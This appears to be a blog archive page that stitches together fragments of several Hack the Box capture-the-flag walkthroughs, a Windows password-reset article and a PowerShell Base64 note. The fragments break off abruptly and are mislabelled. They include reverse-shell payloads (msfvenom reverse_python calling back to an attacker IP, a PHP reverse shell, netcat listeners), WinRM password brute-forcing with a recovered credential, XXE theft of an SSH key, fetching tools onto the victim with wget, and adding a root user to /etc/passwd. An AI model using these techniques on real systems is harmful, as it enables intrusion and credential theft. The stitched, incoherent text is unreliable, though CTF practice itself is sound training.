Maand: oktober 2018

Hello friends!! Today we are going to solve another CTF challenge “Haircut” which is categories as retired lab presented by Hack the Box for making online penetration practices. Solving challenges in this lab is not that much easy until you don’t have some knowledge of WAPT. Let start and learn how to analyse any vulnerability in a network then exploit it for retrieving desired information.

Level: Intermediate

Task: find user.txt and root.txt file on victim’s machine.

Since these labs are online accessible therefore they have static IP. The IP of Haircut is 10.10.10.24 so let’s initiate with nmap port enumeration.

1

nmap–A10.10.10.24

From given below image, you can observe we found port 22 and 80 are open in victim’s network.

Knowing port 80 is open to victim’s network we preferred to explore his IP in a browser and the following image as shown below.

Then I preferred to use dirbuster tool and chose directory list 2-3 medium.txt file for directory brute force attack on http://10.10.10.24 for PHP file extension.

As a result, it found uploads directory with 403 response and an exposed.php file with 200 ok response.

The eval() function is a common function of nodejs that is easy to exploit if data passed to it not filtered correctly. On review source code of some projects in nodejs and researching nodejs application security. I found this function used on some project that it is vulnerable to exploit.

For source code for this tutorial please get from link. You need to install Nodejs and Express first.

To start code run: node index.js

This first part is untilize feature unserialize of a nodejs module. The exploit method happened with PHP, Java… as well. I will show the exploit on next tutorials for some of these languages.

We will use a nodejs module is node-serialize on this example. Ok Let’s make an analysis in depth on it. This module contains an eval() function that may be exploited if we do not check data passed to it correctly.

The functioneval() evaluates JavaScript code represented as a string as documented.

Look at line 74 of module source code we have.

if(obj[key].indexOf(FUNCFLAG) ===0) {

obj[key] =eval(‘(‘+obj[key].substring(FUNCFLAG.length) +’)’);

}

The code contain this line loop through object’s properties, if it is a function then eval is called. So let’s try to inject some javascript code on it.

On unserialize, it loop through properties of this object created from this string. Because say is a function so we have : (function () {return ‘Hi ‘ + this.name}) passed to eval -> eval( (function () {return ‘Hi ‘ + this.name}))

“Hi” is not shown on console log of course. Because the function is not called anywhere.

We need to execute code when the object is processed by function unserialize. Because we did know how the object of the application is and how it processed later. So we need to pass code to eval and it must be executed immediately to show Hi.

Note : Before forwarding the modified content in Burpsuite , we should setup the netcat listener in Kali machine and keep it ready .

1

nc–lvp4444

In order to access proper TTY shell , we had imported python one line script by typing following:

1

python–c‘import pty;pty.spawn(“/bin/bash”)’

Hurray !! We got into the reverse shell of the target machine

Lets have a quick look at the contents

ls

We navigated to many folders , however found interesting stuff in the Documents folder

1

cd Documents

Here we can see that there is a user.txt file , lets read it contents

1

cat user.txt

Finally , we got our first flag i.e output of user.txt file

Now upon further navigation , we also opened the script.py file because of our curiosity to examine the contents of the same . If we do cat script.py , the output displays as print “Script is running”

1

cat script.py

print “Script is running..”

Note : This is an indication that we may need to examine the log files to see which script is running and if it is running on a periodic basis

The best step to move forward is to examine the contents of the log directory in var

1

cd/var/log

Let’s see the files listed over here

1

ls

As we can see that there are multiple syslog files being generated in this folder . The old logs are being zipped and numbered accordingly .The latest logs are always stored in the log file named syslog .So we will open the contents of the syslog file and try to find out if there is something interesting going on.

1

cat syslog

We will notice that there is a cronjob running every 5 minutes , which is copying the output of script.py file (in the home/sun/Documents folder) to the output.txt file

Now we can try to put our own content in the script.py file . For this let’s generate a Reverse shell with the following command

1

msfvenom–pcmd/unix/reverse_python lhost=10.10.14.3lport=1234R

Copy the contents of msfvenom output and save it on Kali Desktop named as script.py ,which will be further used in the subsequent steps

Author : hd7exploit

Today we are going to solve another CTF challenge “Bounty”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Medium

Task: To find user.txt and root.txt file

Let’s start off with our basic nmap command to find out the open ports and services.

I checked the source code of the page, but unfortunately there wasn’t anything interesting there. Since we have nothing else to go on, I started some dirb scans.

We already know that the server is running Microsoft IIS, so I decided to try an IIS-specific wordlist on the page (the following dirb scans have been condensed for clarity):

I then tried to access these two directories, but was given 403 errors both times.

After doing a bit more research on the aspnet_client folder structure, I discovered that we could work out the system version by fuzzing various system_web directories. As such, I saved the list found here, and used dirb to try them all:

---- Scanning URL: http://10.10.10.93/aspnet_client/system_web/ ----

==> DIRECTORY: http://10.10.10.93/aspnet_client/system_web/2_0_50727/

Thanks to this, we know for sure that the server is running Microsoft IIS 2.0.50727. Whilst this might not be useful, it’s always good to enumerate where we can.

That being said, we still get a 403 when trying to access this new-found directory, and so I swapped over to a bigger wordlist:

I took a look inside of the uploadedfiles directory, but received another 403 error. However, since this directory exists, we can assume that there is a webpage somewhere where we can upload files.

I then started my final dirb scan on the website in an attempt to find this upload page. Seeing as we know that the server is running Microsoft IIS, I decided to scan for only .aspx files, because they’re very common in systems like this.

It looks like we’re going to have to either try fuzzing the upload, or enumerate further.

Since fuzzing is never fun, I decided to try and find some more IIS-related file extensions.

Fortunately, I just had to google “microsoft iis file extensions” to find this forum page, which says the following:

We are serving up files for our own application for download from web servers, including IIS. One such file has the .config extension. Turns out that IIS won’t serve this because it thinks it’s a config file of its own.

Let’s now try uploading a .config file, to see if that’s allowed:

It looks like we can successfully upload files! After doing some research on .config files, I came across this article which outlines an easy attack that we can perform (provided that the server executes the file). We’ll do something similar to the technique used in PHP reverse shells, in that we’ll upload the web.config asp file, and the server should interpret whatever we write and show us the output.

We can perform an initial test by uploading a script found on that same website, which should simply add 3 and output the result:

To help brute force WinRM we can use the metasploit module auxiliary/scanner/winrm/winrm_login.

We’ll start with h.potter since he’s listed as a developer, so there’s a good chance he has credentials on the box.

msf > use auxiliary/scanner/winrm/winrm_login
msf auxiliary(scanner/winrm/winrm_login) > show options
Module options (auxiliary/scanner/winrm/winrm_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DOMAIN WORKSTATION yes The domain to use for Windows authentification
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 5985 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
URI /wsman yes The URI of the WinRM service
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host
msf auxiliary(scanner/winrm/winrm_login) > set RHOSTS 10.10.10.81
RHOSTS => 10.10.10.81
msf auxiliary(scanner/winrm/winrm_login) > set USERNAME h.potter
USERNAME => h.potter
msf auxiliary(scanner/winrm/winrm_login) > set PASS_FILE /usr/share/wordlists/fasttrack.txt
PASS_FILE => /usr/share/wordlists/fasttrack.txt
msf auxiliary(scanner/winrm/winrm_login) > set DOMAIN BART.HTB
DOMAIN => BART.HTB
msf auxiliary(scanner/winrm/winrm_login) > run
~~~
~~~
~~~
[+] 10.10.10.81:5985 - Login Successful: BART.HTB\h.potter:Password1
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Yes! We can see that Mr. Potter has some weak credentials. Trying to use another metasploit module leveraging these credentials to get code execution we are unsuccessful and are just presented with 500 errors in response. This is due to metasploit’s winrm modules not currently supporting encryption. By default WinRM requires encryption, unless specifically disabled by the Administrator.

Then we open target IP over web browser but didn’t found any remarkable thing here.

When we found nothing at port 80, then though to use dirbuster for web directory brute-force attack.

Here I found a /host.php file from its result.

When I have explored /host.php in the web browser I found a message “There are 4294967294 possible hosts for” as shown below image. So I search in Google for 4294967294 host which was related to 255.255.255.254 as found in above test.txt file.

It mean we can post test.txt file here with help of burpsuit.

So let’s capture the request and sent the intercepted data into repeater.

As we have predict the test.txt is in XML format so we have tried to validate XXE injection.

Yuppiee! We got the ssh private key successfully, that I copied in text file and named as key.

Then assign permission 600 to saved key (id-rsa) and then try to connect with SSH . You can observe that we get login successfully and accessed the TTY shell of victim’s machine, now let’s find the user.txt

Inside /var/www/html we saw /dev_wiki and it was good to see that this folder holds wordpress setup and configuration files.

So I simply add host IP: 10.10.10.78 and host name: aragog is our local host file which is present inside /etc.

So we explore aragog/dev_wiki in our web browser and got WordPress home page.

As you can observe inside /blog we found a message to Florian from Cliff where he had express the mess of wordpress restoring in very few minutes.

So with help of Google I found a script pspy32s and download it in victim’s VM inside /tmp and also gave execution permission.

pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute.

cd/tmpwget http://10.10.14.6/ pspy32schmod+xpspy32s

After particular time we realize that there is a cronjob that is frequently deleting the dev_wiki folder & replacing it with the backup folder & a script wp-login.py is ran shortly after that process occurs.

Now let’s manipulate the content of wp-user.php file and place a new php code inside it to enumerate username and password.

Today we are going to solve another CTF challenge “Canape” which is available online for those who want to increase their skill in penetration testing and black box testing. Canape is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.

Level: Intermediate

Task: find user.txt and root.txt file on victim’s machine.

Since these labs are online available therefore they have static IP and IP of Canape is 10.10.10.70 so let’s begin with nmap port enumeration.

After getting reverse shell, we start penetrating more and more. We check for the open ports in the target machine that might be listening locally and find that a service is running on port 5984 for the Apache couchDB.

The above command will dump the password and we will find the password for SSH login ( homer )

Or alternatively , couchdb version is vulnerable (CVE-2017-12635) so I found a publicly available exploit (https://www.exploit-db.com/exploits/44498/) to create an user with admin privileges in CouchDB ddbb and… exploit worked!!

homer@canape:/tmp$ sudo /usr/bin/pip install shell.tar.gz
The directory '/home/homer/.cache/pip/http' or its parent directory is not owned by the current user and the cache has been disabled. Please check the permissions and owner of that directory. If executing pip with sudo, you may want sudo's -H flag.
The directory '/home/homer/.cache/pip' or its parent directory is not owned by the current user and caching wheels has been disabled. check the permissions and owner of that directory. If executing pip with sudo, you may want sudo's -H flag.
Processing ./shell.tar.gz
Installing collected packages: UNKNOWN
Running setup.py install for UNKNOWN ... -

Admin Password is the only password in your Operating system which are mostly compromised due to several mischief, whether you forget or lose the password, or your admin account has been invaded by any unknown intruder. The resulting consequence is that you become unable to access any of the Windows server system contents, files, folders, media files, etc. In most of the cases, user who forget or lose their admin password prefer to call a computer expert or take the system to the service centre to unlock their locked computer, but that creates a lot of hassle with unnecessary money expenditure.

Thus here in this article we would demonstrate you few basic methods or trickeries which will definitely help you to reset local administrator password on Windows server 2012 R2 without any external help.

Command Prompt is truly an excellent command line interpreter which can be used to interpret various tasks at the cost of certain code lines in short span of time. Here we would implement cmd to remove the forgotten password. Read the steps carefully to perform the method:

Step 1. Firstly, create a bootable disk using CD/DVD or USB and insert it into the locked computer.

Step 2. Choose your language and click on “Troubleshoot” option.

Step 3. Click on “Command Prompt” button to start it on an advanced mode and type the command scribbled below when the black dialog box turns up:

Today we are going to solve another CTF challenge “DevOops”. DevOops is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Medium

Task: To find user.txt and root.txt file

Note: Since these labs are online available therefore they have a static IP. The IP of DevOops is 10.10.10.91

Walkthrough

Let’s start off with our basic nmap command to find out the open ports and services.

From Nmap scanning, we have enumerated port 22 and 5000 are only open ports on the target’s network, therefore firstly, let’s navigate to port 5000 through a web browser. By exploring given URL, it puts up following web page as shown in the below image.

Since we didn’t get any remarkable clue from the home page, therefore, we have opted Dirb tool for directory enumeration thus execute the following command.

So we explore http://10.10.10.91:5000/upload in the URL and further welcomed by following web Page given below. The following web page lets you upload an XML file, including XML elements Author, Subject and content. For that reason, we have created an XML file with the help of following code and saved as 1.xml

And we obtain so many string as shown in the following image which may perhaps SSH key for root login. So we try some key along git show command to demonstrate the output result. And obtain RSA Private Key which was not working properly.

We will take a look at the source code for the web pages and see if there is anything interesting there. Modifying our XML file to instead read /home/roosa/deploy/src/feed.py reveals something interesting that our gobuster scan missed; another endpoint called newpost.

And looking closer at the code for that endpoint, we see that it uses pickle and simply base 64 decodes it from the request data. As it performs no sanitisation, that means we can have some fun.

Hello friends!! Today we are going to solve another CTF challenge “Apocalyst ” which is available online for those who want to increase their skill in penetration testing and black box testing. Apocalyst is retried vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level, they have collection of vulnerable labs as challenges from beginners to Expert level. We are going to start a new series of hack the box beginning with Apocalyst craft which is designed for beginners.

Level: Beginner

Task: find user.txt and root.txt file in victim’s machine.

Since these labs are online available therefore they have static IP and IP of Apocalyst is 10.10.10.46 so let’s begin with nmap port enumeration.

CeWL & Dirbuster
All of the common wordlists fail to return anything relevant when fuzzing for files and directories.
Generating a wordlist from strings on the website using CeWL, a lot more is uncovered during fuzzing.

root@kali:~/htb/calamity# cewl 10.10.10.46 > wordlist.txt

When we run our custom wordlist with ggobuster again we can see that all requests have a response size of 157 except one that has a size 175.

which means it has different content than all of the other requests or there’s an abnormal error.

So next we decided to explore http://apocalypt.htb/Rightiousness through browser URL and what we see is a image opened on the browser. As shown below.

The image got us wondering there must a clue behind the Image. On second thought we decided to do Steganalysis on the image. Using the steghide –info image.jpg command in the kali terminal. And we found there is a list.txt file embedded behind the image.

Now we need to extract that list.txt file embedded behind the image. Therefore we used steghide –extract –sf image.jpg command for extraction. We simply need to leave the Enter passphrase option blank and Press Enter. List.txt file has successfully been extracted on our Desktop.

Again we have used wpscan to find out the password credentials for the login credentials Falaraki we earlier took using the wpscan. Here we have used

…and were in!

Now we can upload our php reverse shell in the Appearance Editor. I got my php shell from PenTestMonkey I’m not going to paste the entire code here because it’s a lot of code, so all you have to do is change your ip and port number. Where it says //CHANGE THIS to your ip and desired port number.

$ip = ‘127.0.0.1’; // CHANGE THIS
$port = 1234; // CHANGE THIS

Save the changes made to the file once your reverse shell is in and setup your netcat listener. Then execute the php reverse shell.

http://apocalyst.htb/wp-content/themes/twentyseventeen/404.php

Now we used command ls –la in the falaraki directory as shown. Here we discovered a file named .secret which left us curious to read its content using the cat .secret command. It contains an encoded code in base64 which we need to decode to read the content behind it.

On another terminal LinEnum tool from github which is very well known for checking privilege escalation in directories. First we have downloaded the Linenum-master.zip file from github. After that we have shared the Linenum-master folder over the server by making a simple HTTP server on port 80 using command

python –mSimpleHTTPServer80

Now we will download the shared file using wget http://10.10.14.3/LinEnum.sh command for our falaraki@apocalyst user. Now need to give permission to LinEnum.sh using command chmod 777 Linenum.sh. Now to execute it we have given command ./LinEnum.sh .

The LinEnum tool has given all the sensitive files that can be read/write in the falaraki directory.

In a new terminal we are using openssl to make a new salted combined username and password in MD5 algorithm. For this the command used is

Now using vi /etc/passwd command we are editing the passwd directory for adding a new user. The for the new user is username:Salted Value of username and password:0:0:root:/root:/bin/bash , we have saved this new user by using :wq command.

Simple Obfuscation with PowerShell using Base64 Encoding

I recently received a question from someone wanting to know how I encoded a string of text on my blog site. Back in January of 2013, I competed in Jeff Hicks PowerShell Challenge that was held by TrainSignal. One of the questions had an encoded command which you were to decode. I figured out that the -EncodedCommandparameter of PowerShell.exe could not only be used to run commands that are encoded with Base64, that it could also be used to easily decode a string of text that was encoded with Base64.

1

powershell.exe/?

The help for PowerShell.exe also shows you how to encode a command with Base64:

Encoding something like the domain name for this blog site is easy enough: